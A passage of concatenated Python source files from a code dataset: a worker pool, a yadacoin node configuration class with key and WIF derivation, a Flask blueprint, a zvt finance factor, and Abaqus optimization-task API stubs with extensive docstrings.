# eventually become 0 as the workers exit when finished
def alive(self):
return any((x.is_alive() for x in self.workers))
def register(self, tasks):
if self.alive():
raise PoolError("Cannot register tasks while the pool is running")
for task in tasks:
self.taskmap[id(task)] = task
# mp: just check + raise if not present
# thr: just update, don't check
def _check_update_taskmap(self, task):
if id(task) not in self.taskmap:
raise PoolError(f"Cannot submit unregistered task {task}")
def submit(self, task, shared={}):
if self.shutting_down:
raise PoolError("The pool is shutting down")
if not self.alive():
raise PoolError("The pool is not running")
self._check_update_taskmap(task)
self.taskq.put((id(task), shared))
self.active_tasks += 1
def shutdown(self, wait=False):
if self.shutting_down:
raise PoolError("The pool is already shutting down")
self.shutting_down = True
for _ in range(len(self.workers)):
self.taskq.put(None)
if wait:
for w in self.workers:
w.join()
# iter_results over queued results still valid after this
def iter_results(self):
while self.unfinished_workers > 0 or self.active_tasks > 0:
msg = self.resultq.get()
if msg.type == 'finished':
self.workers[msg.workid].join()
self.unfinished_workers -= 1
elif msg.type == 'taskdone':
task = self.taskmap[msg.taskidx]
self.active_tasks -= 1
yield common.TaskRes(task, msg.shared, msg.ret, msg.excinfo)
else:
raise RuntimeError(f"unexpected msg: {msg}")
class ThreadWorkerPool(ProcessWorkerPool):
_Queue = queue.Queue
_Worker = threading.Thread
def register(self, tasks):
pass
def _check_update_taskmap(self, task):
self.taskmap[id(task)] = task
| StarcoderdataPython |
1619218 | import binascii
import hashlib
import json
from logging import getLogger
from time import time
import base58
from bip32utils import BIP32Key
from bitcoin.wallet import P2PKHBitcoinAddress
from coincurve import PrivateKey, PublicKey
from mnemonic import Mnemonic
CONFIG = None
def get_config():
return CONFIG
class Config(object):
def __init__(self, config):
self.start_time = int(time())
self.seed = config.get('seed', '')
self.xprv = config.get('xprv', '')
self.username = config.get('username', '')
self.network = config.get('network', 'mainnet')
self.use_pnp = config.get('use_pnp', True)
self.ssl = config.get('ssl', False)
self.origin = config.get('origin', False)
self.max_inbound = config.get('max_inbound', 10)
self.max_outbound = config.get('max_outbound', 10)
self.max_miners = config.get('max_miners', -1)
self.polling = config.get('polling', 30)
if 0 < self.polling < 30:
getLogger("tornado.application").error("Using too small a polling value ({}), use 0 or > 30"
.format(self.polling))
self.public_key = config['public_key']
self.address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(self.public_key)))
self.private_key = config['private_key']
self.wif = self.to_wif(self.private_key)
self.bulletin_secret = self.get_bulletin_secret()
self.mongodb_host = config['mongodb_host']
self.database = config['database']
self.site_database = config['site_database']
self.web_server_host = config['web_server_host']
self.web_server_port = config['web_server_port']
if config['peer_host'] == '0.0.0.0' or config['peer_host'] == 'localhost':
raise Exception("Cannot use localhost or 0.0.0.0, must specify public ipv4 address")
if config['peer_host'] == '[my public ip]':
raise Exception("Please configure your peer_post to your public ipv4 address")
self.peer_host = config['peer_host']
self.peer_port = config['peer_port']
self.serve_host = config['serve_host']
self.serve_port = config['serve_port']
self.public_ip = config.get('public_ip', self.serve_host)
self.callbackurl = config['callbackurl']
self.fcm_key = config['fcm_key']
self.post_peer = config.get('post_peer', True)
self.extended_status = config.get('extended_status', False)
self.peers_seed = config.get('peers_seed', []) # not used, superceeded by config/seed.json
self.force_broadcast_to = config.get('force_broadcast_to', [])
self.force_polling = config.get('force_polling', [])
self.outgoing_blacklist = config.get('outgoing_blacklist', [])
# Do not try to test or connect to ourselves.
self.outgoing_blacklist.append(self.serve_host)
self.outgoing_blacklist.append(self.public_ip)
self.protocol_version = 1
# Config also serves as backbone storage for all singleton helpers used by the components.
self.mongo = None
self.consensus = None
self.peers = None
self.BU = None
self.GU = None
self.SIO = None
self.debug = False
self.mp = None
async def on_new_block(self, block):
"""Dispatcher for the new bloc event
This is called with a block object when we insert a new one in the chain."""
# Update BU
# We can either invalidate, or directly set the block as cached one.
# self.BU.invalidate_last_block()
block_dict = block.to_dict()
self.BU.set_latest_block(block_dict) # Warning, this is a dict, not a Block!
def debug_log(self, string: str):
# Helper to write temp string to a debug file
with open("debug.trace", "a") as fp:
fp.write(str(int(time())) + ' - ' + string + "\n")
def get_status(self):
pool_status = 'N/A'
if self.mp:
pool_status = self.mp.get_status()
status = {'version': self.protocol_version, 'network': self.network,
# 'connections':{'outgoing': -1, 'ingoing': -1, 'max': -1},
'peers': self.peers.get_status(),
'pool': pool_status, 'height': self.BU.get_latest_block()['index'],
'uptime': int(time() - self.start_time)}
# TODO: add uptime in human readable format
return status
@classmethod
def generate(cls, xprv=None, prv=None, seed=None, child=None, username=None):
mnemonic = Mnemonic('english')
# generate 12 word mnemonic seed
if not seed and not xprv and not prv:
seed = mnemonic.generate(256)
private_key = None
if seed:
# create bitcoin wallet
entropy = mnemonic.to_entropy(seed)
key = BIP32Key.fromEntropy(entropy)
private_key = key.PrivateKey().hex()
extended_key = key.ExtendedKey()
else:
raise Exception('No Seed')
if prv:
private_key = PrivateKey.from_hex(bytes.fromhex(prv)).to_hex()
extended_key = ''
if xprv:
key = BIP32Key.fromExtendedKey(xprv)
private_key = key.PrivateKey().hex()
extended_key = key.ExtendedKey()
if xprv and child:
for x in child:
key = key.ChildKey(int(x))
private_key = key.PrivateKey().hex()
if not private_key:
raise Exception('No key')
return cls({
"seed": seed or '',
"xprv": extended_key or '',
"private_key": private_key,
"wif": cls.generate_wif(private_key),
"public_key": PublicKey.from_point(key.K.pubkey.point.x(), key.K.pubkey.point.y()).format().hex(),
"address": str(key.Address()),
"serve_host": "0.0.0.0",
"serve_port": 8000,
"use_pnp": True,
"ssl": False,
"origin": '',
"polling": 0,
"post_peer": False,
# "public_ip": "", # TODO
"peer_host": "",
"peer_port": 8000,
"web_server_host": "0.0.0.0",
"web_server_port": 5000,
"peer": "http://localhost:8000",
"callbackurl": "http://0.0.0.0:5000/create-relationship",
"fcm_key": "",
"database": "yadacoin",
"site_database": "yadacoinsite",
"mongodb_host": "localhost",
"mixpanel": "",
"username": username or '',
"network": "mainnet"
})
@classmethod
def from_dict(cls, config):
from yadacoin.transactionutils import TU
cls.seed = config.get('seed', '')
cls.xprv = config.get('xprv', '')
cls.username = config.get('username', '')
cls.use_pnp = config.get('use_pnp', True)
cls.ssl = config.get('ssl', True)
cls.origin = config.get('origin', True)
cls.polling = config.get('polling', -1)
cls.network = config.get('network', 'mainnet')
cls.public_key = config['public_key']
cls.address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(cls.public_key)))
cls.private_key = config['private_key']
cls.wif = cls.generate_wif(cls.private_key)
cls.bulletin_secret = TU.generate_deterministic_signature(config, config['username'], config['private_key'])
cls.mongodb_host = config['mongodb_host']
cls.database = config['database']
cls.site_database = config['site_database']
cls.web_server_host = config['web_server_host']
cls.web_server_port = config['web_server_port']
if config['peer_host'] == '0.0.0.0' or config['peer_host'] == 'localhost':
raise Exception("cannot use localhost or 0.0.0.0, must specify public ipv4 address")
if config['peer_host'] == '[my public ip]':
raise Exception("please configure your peer_post to your public ipv4 address")
cls.peer_host = config['peer_host']
cls.peer_port = config['peer_port']
cls.serve_host = config['serve_host']
cls.serve_port = config['serve_port']
cls.callbackurl = config['callbackurl']
cls.fcm_key = config['fcm_key']
def get_bulletin_secret(self):
from yadacoin.transactionutils import TU
return TU.generate_deterministic_signature(self, self.username, self.private_key)
def to_wif(self, private_key):
private_key_static = private_key
extended_key = "80"+private_key_static+"01"
first_sha256 = hashlib.sha256(binascii.unhexlify(extended_key)).hexdigest()
second_sha256 = hashlib.sha256(binascii.unhexlify(first_sha256)).hexdigest()
final_key = extended_key+second_sha256[:8]
wif = base58.b58encode(binascii.unhexlify(final_key)).decode('utf-8')
return wif
@classmethod
def generate_wif(cls, private_key):
private_key_static = private_key
extended_key = "80"+private_key_static+"01"
first_sha256 = hashlib.sha256(binascii.unhexlify(extended_key)).hexdigest()
second_sha256 = hashlib.sha256(binascii.unhexlify(first_sha256)).hexdigest()
final_key = extended_key+second_sha256[:8]
wif = base58.b58encode(binascii.unhexlify(final_key)).decode('utf-8')
return wif
def to_dict(self):
return {
'seed': self.seed,
'xprv': self.xprv,
'public_key': self.public_key,
'address': self.address,
'private_key': self.private_key,
'wif': self.wif,
'bulletin_secret': self.bulletin_secret,
'mongodb_host': self.mongodb_host,
'username': self.username,
'network': self.network,
'database': self.database,
'site_database': self.site_database,
'web_server_host': self.web_server_host,
'web_server_port': self.web_server_port,
'peer_host': self.peer_host,
'peer_port': self.peer_port,
'serve_host': self.serve_host,
'serve_port': self.serve_port,
'use_pnp': self.use_pnp,
'ssl': self.ssl,
'origin': self.origin,
'fcm_key': self.fcm_key,
'polling': self.polling,
'callbackurl': self.callbackurl
}
def to_json(self):
return json.dumps(self.to_dict(), indent=4)
| StarcoderdataPython |
1767654 | from flask import Blueprint
admin = Blueprint('admin', __name__, template_folder='templates')
from app.admin import routes | StarcoderdataPython |
3342651 | <reponame>ChineseSuperman/zvt
# -*- coding: utf-8 -*-
from typing import List, Union
import pandas as pd
from zvdata.factor import ScoreFactor
from zvdata.structs import IntervalLevel
from zvt.domain import FinanceFactor
class FinanceGrowthFactor(ScoreFactor):
def __init__(self,
entity_ids: List[str] = None,
entity_type: str = 'stock',
exchanges: List[str] = ['sh', 'sz'],
codes: List[str] = None,
the_timestamp: Union[str, pd.Timestamp] = None,
start_timestamp: Union[str, pd.Timestamp] = None,
end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = [FinanceFactor.op_income_growth_yoy, FinanceFactor.net_profit_growth_yoy,
FinanceFactor.rota,
FinanceFactor.roe],
filters: List = None,
order: object = None,
limit: int = None,
provider: str = 'eastmoney',
level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = 'entity_id',
time_field: str = 'report_date',
trip_timestamp: bool = True,
auto_load: bool = True,
keep_all_timestamp: bool = False,
fill_method: str = 'ffill',
effective_number: int = 10,
depth_computing_method='ma',
depth_computing_param={'window': '100D', 'on': 'report_date'},
breadth_computing_method='quantile',
breadth_computing_param={'score_levels': [0.1, 0.3, 0.5, 0.7, 0.9]}) -> None:
super().__init__(FinanceFactor, entity_ids, entity_type, exchanges, codes, the_timestamp, start_timestamp,
end_timestamp, columns, filters, order, limit, provider, level,
category_field, time_field, trip_timestamp, auto_load, keep_all_timestamp, fill_method,
effective_number, depth_computing_method, depth_computing_param, breadth_computing_method,
breadth_computing_param)
if __name__ == '__main__':
factor = FinanceGrowthFactor(start_timestamp='2018-01-01',
end_timestamp='2018-12-31',
codes=['000338', '000778', '601318'],
auto_load=True)
factor.draw_result(chart='bar')
| StarcoderdataPython |
1644529 | import typing
from abaqusConstants import *
from .BeadTask import BeadTask
from .ShapeTask import ShapeTask
from .SizingTask import SizingTask
from .TopologyTask import TopologyTask
from ..Model.ModelBase import ModelBase
class OptimizationTaskModel(ModelBase):
"""Abaqus creates a Model object named `Model-1` when a session is started.
Notes
-----
This object can be accessed by:
.. code-block:: python
mdb.models[name]
"""
def BeadTask(self, name: str, abaqusSensitivities: Boolean = True,
algorithm: SymbolicConstant = GENERAL_OPTIMIZATION, areBCRegionsFrozen: Boolean = OFF,
beadIter: str = 1, beadMaxMembraneStress: str = 0, beadMinStress: str = 0,
beadPerturbation: str = 0, beadWidth: SymbolicConstant = DEFAULT, curveSmooth: str = 5,
filterRadius: str = 4, filterRadiusBy: SymbolicConstant = VALUE,
flipNormalDir: Boolean = OFF, frozenBoundaryConditionRegion: SymbolicConstant = MODEL,
isSensCalcOnlyOnDesignNodes: Boolean = OFF,
modeTrackingRegion: SymbolicConstant = MODEL, nodalMoveLimit: float = 0,
nodeSmooth: SymbolicConstant = DEFAULT,
nodeUpdateStrategy: SymbolicConstant = CONSERVATIVE, numTrackedModes: int = 5,
updateShapeBasisVectors: SymbolicConstant = EVERY_CYCLE, groupOperator: Boolean = OFF) -> BeadTask:
"""This method creates a BeadTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].BeadTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
GENERAL_OPTIMIZATION.
areBCRegionsFrozen
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
beadIter
An int specifying the step size of the optimization. The default value is 1.
beadMaxMembraneStress
A float specifying maximum membrane/bending stress. The default value is 0.1.
beadMinStress
A float specifying minimum stress. The default value is 0.001.
beadPerturbation
A Sets perturbation size for finite differences. The default value is 0.0001.
beadWidth
A SymbolicConstant specifying the Optimization product default or a float specifying the
bead width. The default value is DEFAULT.
curveSmooth
A float specifying relative value to the middle element edge length such that normals in
this area do not cross each other. The default value is 5.
filterRadius
A float specifying the filter radius. The default value is 4.
filterRadiusBy
A SymbolicConstant specifying the method used to define filter radius. Possible values
are VALUE and REFERENCE. The default is VALUE.
flipNormalDir
A Boolean specifying whether the growth direction is along the normal direction of
elements or opposite to the normal direction. The default value is OFF
frozenBoundaryConditionRegion
When nodes with boundary conditions are excluded from the optimization
(*frozenBoundaryConditionRegions* = ON). you can specify that this exclusion apply to
nodes throughout the model or only to those nodes from a specific region. Set this
parameter to the SymbolicConstant MODEL to apply the freeze to the entire model, or set
this parameter to a Region object to specify an individual region over which nodes with
boundary conditions should be frozen. The default value is MODEL.
isSensCalcOnlyOnDesignNodes
A Boolean specifying whether to calculate the sensitivities only on design nodes or the
whole model. The default value is ON
modeTrackingRegion
The SymbolicConstant MODEL or a Region object specifying the region to use for mode
tracking. The default value is MODEL.
nodalMoveLimit
A Float specifying the maximum change in nodal displacement per design cycle. The
default value is 0.1.
nodeSmooth
A SymbolicConstant specifying the Optimization product default or a float specifying the
node smooth. The default value is DEFAULT.
nodeUpdateStrategy
A SymbolicConstant specifying the strategy for how the nodal displacements are updated
in the method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and
AGGRESSIVE. The default value is CONSERVATIVE.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
updateShapeBasisVectors
A SymbolicConstant specifying whether to update shape basis vectors in the first design
cycle or every design cycle. Possible values are EVERY_CYCLE and FIRST_CYCLE. The
default value is EVERY_CYCLE.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A BeadTask object.
"""
self.optimizationTasks[name] = optimizationTask = BeadTask(name, abaqusSensitivities, algorithm,
areBCRegionsFrozen, beadIter, beadMaxMembraneStress,
beadMinStress, beadPerturbation, beadWidth,
curveSmooth, filterRadius, filterRadiusBy,
flipNormalDir, frozenBoundaryConditionRegion,
isSensCalcOnlyOnDesignNodes, modeTrackingRegion,
nodalMoveLimit, nodeSmooth, nodeUpdateStrategy,
numTrackedModes, updateShapeBasisVectors,
groupOperator)
return optimizationTask
def ShapeTask(self, name: str, abaqusSensitivities: Boolean = True,
absoluteStepSizeControl: SymbolicConstant = MINIMUM, activateDurability: Boolean = ON,
additionalDurabilityFiles: str = '',
algorithm: SymbolicConstant = CONDITION_BASED_OPTIMIZATION,
constrainedLaplacianConvergenceLevel: SymbolicConstant = NORMAL,
curvatureSmoothingEdgeLength: float = 5, durabilityInputfile: str = '',
durabilitySolver: str = FE_SAFE, equalityConstraintTolerance: float = None,
featureRecognitionAngle: float = 30, filterExponent: float = 1,
filterMaxRadius: float = None, filterRadiusReduction: float = None,
firstCycleDeletedVolumeTechnique: SymbolicConstant = OFF,
freezeBoundaryConditionRegions: Boolean = OFF,
frozenBoundaryConditionRegion: SymbolicConstant = MODEL,
geometricRestrictionEvaluationFrequency: SymbolicConstant = LOW,
growthScaleFactor: float = 1, haltUponViolation: Boolean = OFF,
layerReferenceRegion: str = None,
meshSmoothingRegionMethod: SymbolicConstant = TASK_REGION_LAYERS,
meshSmoothingStrategy: SymbolicConstant = CONSTRAINED_LAPLACIAN,
midsideInterpolation: SymbolicConstant = POSITIONS,
numFreeNodeLayers: SymbolicConstant = 0, numSmoothedElementLayers: int = None,
presumeFeasibleBCRegionAtStart: Boolean = ON, quadMaxAngle: float = 160,
quadMinAngle: float = 20, quadSkew: float = 30, quadTaper: float = 0,
region: SymbolicConstant = MODEL, reportPoorQualityElements: Boolean = OFF,
reportQualityViolation: Boolean = OFF, shrinkScaleFactor: float = 1,
smoothingRegion: str = None, targetMeshQuality: SymbolicConstant = LOW,
tetAspectRatio: float = 100, tetMaxAspect: float = 8, tetMinAspect: float = 0,
tetSkew: float = 100, triMaxAngle: float = 140, triMinAngle: float = 20,
updateShapeBasisVectors: SymbolicConstant = EVERY_CYCLE, groupOperator: Boolean = OFF) -> ShapeTask:
"""This method creates a ShapeTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].ShapeTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
absoluteStepSizeControl
A SymbolicConstant specifying whether to control the permitted absolute step size by the
average optimization displacement or minimum optimization displacement. Possible values
are MINIMUM and AVERAGE. The default value is MINIMUM.
activateDurability
A boolean specifying whether or not the durability approach of optimization is turned
on. The default value is ON.
additionalDurabilityFiles
A String specifying the path of additional files pertaining to durability optimization.
Only valid if the *activateDurability* argument is ON.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
CONDITION_BASED_OPTIMIZATION.
constrainedLaplacianConvergenceLevel
A SymbolicConstant specifying the constrained Laplacian convergence level. Possible
values are NORMAL, CONSERVATIVE, and AGGRESSIVE. The default value is NORMAL.
curvatureSmoothingEdgeLength
A Float specifying the edge length for the movement vector. The default value is 5.0.
durabilityInputfile
A string specifying the path of the input file. Only valid if the *activateDurability*
argument is ON and is a required argument in that case.
durabilitySolver
A String specifying the type of solver for durability optimization. Possible values are:
FE_SAFE, FEMFAT, FLANS, MSC_FATIGUE, FE_FATIGUE, DESIGN_LIFE, CUSTOM, FEMSITE. The
default value is FE_SAFE. Only valid if the *activateDurability* argument is ON.
equalityConstraintTolerance
A Float specifying the equality constraint tolerance. The default value is 10–3.
featureRecognitionAngle
A Float specifying the mesh smoothing feature recognition angle for edges and corners.
The default value is 30.0.
filterExponent
A Float specifying the weight depending on the radius, used when *filterMaxRadius* is
specified. The default value is 1.0.
filterMaxRadius
None or a Float specifying the maximum influence radius for equivalent stress. The
default value is None.
filterRadiusReduction
None or a Float specifying the reduction of the radius depending on surface bending,
used when *filterMaxRadius* is specified. The default value is None.
firstCycleDeletedVolumeTechnique
A SymbolicConstant specifying the method of specifying volume that can be removed
immediately in the first design cycle. Possible values are OFF, PERCENTAGE, and
ABSOLUTE. The default value is OFF.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude nodes with boundary conditions from the
optimization. The default value is OFF.
frozenBoundaryConditionRegion
The SymbolicConstant MODEL or a Region object specifying the region in which to freeze
boundary condition regions, or the SymbolicConstant MODEL, used with
*freezeBoundaryConditionRegions*. The default value is MODEL.
geometricRestrictionEvaluationFrequency
A SymbolicConstant specifying the frequency of evaluating geometric restrictions during
mesh smoothing. Possible values are LOW, MEDIUM, and HIGH. The default value is LOW.
growthScaleFactor
A Float specifying the scale factor to apply to optimization displacements for nodes
with growth. The default value is 1.0.
haltUponViolation
A Boolean specifying whether to halt the optimization if quality criteria are not
satisified. The default value is OFF.
layerReferenceRegion
None or a Region object specifying the region specifying the first node layer for mesh
smoothing, used when *meshSmoothingRegionMethod* is TASK_REGION_LAYERS. The default
value is None.
meshSmoothingRegionMethod
A SymbolicConstant specifying the method used to determine the mesh smoothing region.
The REGION value uses the *smoothingRegion*. The NUMBER_OF_LAYERS value uses the
*layerReferenceRegion*. The TASK_REGION_LAYERS value will smooth six layers using the
task region. Possible values are TASK_REGION_LAYERS, REGION, and NUMBER_OF_LAYERS. The
default value is TASK_REGION_LAYERS.
meshSmoothingStrategy
A SymbolicConstant specifying the method smoothing strategy. Possible values are
CONSTRAINED_LAPLACIAN and LOCAL_GRADIENT. The default value is CONSTRAINED_LAPLACIAN.
midsideInterpolation
A SymbolicConstant specifying the approach used when treating midside node positions
during optimization. POSITIONS indicates midside node positions are interpolated
linearly by position. OPTIMIZATION_DISPLACEMENT indicates they are interpolated by
optimization displacement of corner nodes. Possible values are POSITIONS and
OPTIMIZATION_DISPLACEMENT. The default value is POSITIONS.
numFreeNodeLayers
The SymbolicConstant FIX_NONE or an Int specifying the number of node layers adjoining
the task region to remain free during mesh smoothing. A value of 0 indicates that no
layers are free and all layers are fixed. The default value is 0.
numSmoothedElementLayers
None or an Int specifying the number of layers for mesh smoothing when
*meshSmoothingRegionMethod* is NUMBER_OF_LAYERS. The default value is None.
presumeFeasibleBCRegionAtStart
A Boolean specifying whether to ignore automatically frozen boundary condition regions
in the first design cycle. This is used with *freezeBoundaryConditionRegions*. The
default value is ON.
quadMaxAngle
A Float specifying the maximum angle for quad elements during mesh smoothing. The
default value is 160.0.
quadMinAngle
A Float specifying the minimum angle for quad elements during mesh smoothing. The
default value is 20.0.
quadSkew
A Float specifying the skew angle for quad elements during mesh smoothing, used with
*reportQualityViolation*. The default value is 30.0.
quadTaper
A Float specifying the taper for quad elements during mesh smoothing, used with
*reportQualityViolation*. The default value is 0.5.
region
The SymbolicConstant MODEL or a Region object specifying the region to which the
optimization task is applied. The default value is MODEL.
reportPoorQualityElements
A Boolean specifying whether to report poor quality elements during mesh smoothing. The
default value is OFF.
reportQualityViolation
A Boolean specifying whether to report a quality criteria violation during mesh
smoothing. The default value is OFF.
shrinkScaleFactor
A Float specifying the scale factor to apply to optimization displacements for nodes
with shrinkage. The default value is 1.0.
smoothingRegion
None or a Region object specifying the mesh smoothing region, used when
*meshSmoothingRegionMethod* is REGION. The default value is None.
targetMeshQuality
A SymbolicConstant specifying the target mesh quality for mesh smoothing. Possible
values are NONE, LOW, MEDIUM, and HIGH. The default value is LOW.
tetAspectRatio
A Float specifying the tet element aspect ratio during mesh smoothing. The default value
is 100.0.
tetMaxAspect
A Float specifying the maximum tet element aspect ratio during mesh smoothing. The
default value is 8.0.
tetMinAspect
A Float specifying the minimum tet element aspect ratio during mesh smoothing. The
default value is 0.222.
tetSkew
A Float specifying the tet element skew value during mesh smoothing. The default value
is 100.0.
triMaxAngle
A Float specifying the tri element maximum angle during mesh smoothing. The default
value is 140.0.
triMinAngle
A Float specifying the tri element maximum angle during mesh smoothing. The default
value is 20.0.
updateShapeBasisVectors
A SymbolicConstant specifying whether to update shape basis vectors in the first design
cycle or every design cycle. Possible values are EVERY_CYCLE and FIRST_CYCLE. The
default value is EVERY_CYCLE.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A ShapeTask object.
"""
self.optimizationTasks[name] = optimizationTask = ShapeTask(name, abaqusSensitivities, absoluteStepSizeControl,
activateDurability, additionalDurabilityFiles,
algorithm, constrainedLaplacianConvergenceLevel,
curvatureSmoothingEdgeLength, durabilityInputfile,
durabilitySolver, equalityConstraintTolerance,
featureRecognitionAngle, filterExponent,
filterMaxRadius, filterRadiusReduction,
firstCycleDeletedVolumeTechnique,
freezeBoundaryConditionRegions,
frozenBoundaryConditionRegion,
geometricRestrictionEvaluationFrequency,
growthScaleFactor, haltUponViolation,
layerReferenceRegion, meshSmoothingRegionMethod,
meshSmoothingStrategy, midsideInterpolation,
numFreeNodeLayers, numSmoothedElementLayers,
presumeFeasibleBCRegionAtStart, quadMaxAngle,
quadMinAngle, quadSkew, quadTaper, region,
reportPoorQualityElements, reportQualityViolation,
shrinkScaleFactor, smoothingRegion,
targetMeshQuality, tetAspectRatio, tetMaxAspect,
tetMinAspect, tetSkew, triMaxAngle, triMinAngle,
updateShapeBasisVectors, groupOperator)
return optimizationTask
def SizingTask(self, name: str, abaqusSensitivities: Boolean = True,
elementThicknessDeltaStopCriteria: float = 0,
freezeBoundaryConditionRegions: Boolean = OFF, freezeLoadRegions: Boolean = ON,
modeTrackingRegion: str = MODEL, numFulfilledStopCriteria: int = 2,
numTrackedModes: int = 5, objectiveFunctionDeltaStopCriteria: float = 0,
stopCriteriaDesignCycle: int = 4, thicknessMoveLimit: float = 0,
thicknessUpdateStrategy: SymbolicConstant = NORMAL, groupOperator: Boolean = OFF) -> SizingTask:
"""This method creates a SizingTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].SizingTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
elementThicknessDeltaStopCriteria
A Float specifying the stop criteria based on the change in element thickness. The
default value is 0.5 × 10–2.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
freezeLoadRegions
A Boolean specifying whether to exclude elements with loads and elements with loaded
nodes from the optimization. The default value is ON.
modeTrackingRegion
The SymbolicConstatnt MODEL or a Region object specifying the region to use for mode
tracking. The default value is MODEL.
numFulfilledStopCriteria
An Int specifying the number of stop criteria. The default value is 2.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
objectiveFunctionDeltaStopCriteria
A Float specifying the stop criteria based on the change in objective function. The
default value is 0.001.
stopCriteriaDesignCycle
An Int specifying the first design cycle used to evaluate convergence criteria. The
default value is 4.
thicknessMoveLimit
A Float specifying the maximum change in thickness per design cycle. The default value
is 0.25.
thicknessUpdateStrategy
A SymbolicConstant specifying the strategy for how the thickness is updated in the
method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and AGGRESSIVE.
The default value is NORMAL.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A SizingTask object.
"""
self.optimizationTasks[name] = optimizationTask = SizingTask(name, abaqusSensitivities,
elementThicknessDeltaStopCriteria,
freezeBoundaryConditionRegions, freezeLoadRegions,
modeTrackingRegion, numFulfilledStopCriteria,
numTrackedModes,
objectiveFunctionDeltaStopCriteria,
stopCriteriaDesignCycle, thicknessMoveLimit,
thicknessUpdateStrategy, groupOperator)
return optimizationTask
def TopologyTask(self, name: str, abaqusSensitivities: Boolean = True,
algorithm: SymbolicConstant = GENERAL_OPTIMIZATION, densityMoveLimit: float = 0,
densityUpdateStrategy: SymbolicConstant = NORMAL,
elementDensityDeltaStopCriteria: float = 0, filterRadius: float = None,
firstCycleDeletedVolume: float = 5,
firstCycleDeletedVolumeTechnique: SymbolicConstant = OFF,
freezeBoundaryConditionRegions: Boolean = OFF, freezeLoadRegions: Boolean = ON,
frequencySpectrumWeight: float = 6, initialDensity: SymbolicConstant = DEFAULT,
materialInterpolationPenalty: float = 3,
materialInterpolationTechnique: SymbolicConstant = DEFAULT, maxDensity: float = 1,
minDensity: float = None, modeTrackingRegion: SymbolicConstant = MODEL,
numDesignCycles: int = 15, numFulfilledStopCriteria: int = 2, numTrackedModes: int = 5,
objectiveFunctionDeltaStopCriteria: float = None, region: SymbolicConstant = MODEL,
softDeletionMethod: SymbolicConstant = STANDARD, softDeletionRadius: float = 0,
softDeletionRegion: str = None, softDeletionThreshold: float = None,
stepSize: SymbolicConstant = MEDIUM,
stiffnessMassDamping: typing.Union[SymbolicConstant, float] = AVERAGE_EDGE_LENGTH,
stopCriteriaDesignCycle: int = 4, structuralMassDamping: float = None,
viscousMassDamping: float = None, viscousStiffnessDamping: float = None,
groupOperator: Boolean = OFF) -> TopologyTask:
"""This method creates a TopologyTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].TopologyTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
GENERAL_OPTIMIZATION.
densityMoveLimit
A Float specifying the maximum density change per design cycle. The default value is
0.25.
densityUpdateStrategy
A SymbolicConstant specifying the strategy for how the densities are updated in the
method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and AGGRESSIVE.
The default value is NORMAL.
elementDensityDeltaStopCriteria
A Float specifying the stop criteria based upon the change in element densities. The
default value is 0.5×10–2.
filterRadius
None or a Float specifying the mesh filter radius for mesh independence and minimum
size. The default value is None.
firstCycleDeletedVolume
A Float specifying the volume that can be removed immediately in the first design cycle.
The default value is 5.0.
firstCycleDeletedVolumeTechnique
A SymbolicConstant specifying the method of quantifying volume that can be removed
immediately in the first design cycle. Possible values are OFF, PERCENTAGE, and
ABSOLUTE. The default value is OFF.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
freezeLoadRegions
A Boolean specifying whether to exclude elements with loads and elements with loaded
nodes from the optimization. The default value is ON.
frequencySpectrumWeight
A Float specifying the weighting factor for frequency spectrum peaks. The default value
is 6.0.
initialDensity
A SymbolicConstant specifying the Optimization product default or a float specifying the
initial density. The default value is DEFAULT.
materialInterpolationPenalty
A Float specifying the penalty factor for the material interpolation technique. The
default value is 3.0.
materialInterpolationTechnique
A SymbolicConstant specifying the material interpolation technique: optimization product
default, solid isotropic material with penalization, or rational approximation of
material properties. Possible values are DEFAULT, SIMP, and RAMP. The default value is
DEFAULT.
maxDensity
A Float specifying the maximum density in the density update. The default value is 1.0.
minDensity
A Float specifying the minimum density in the density update. The default value is 10–3.
modeTrackingRegion
The SymbolicConstant MODEL or a Region object specifying the region to use for mode
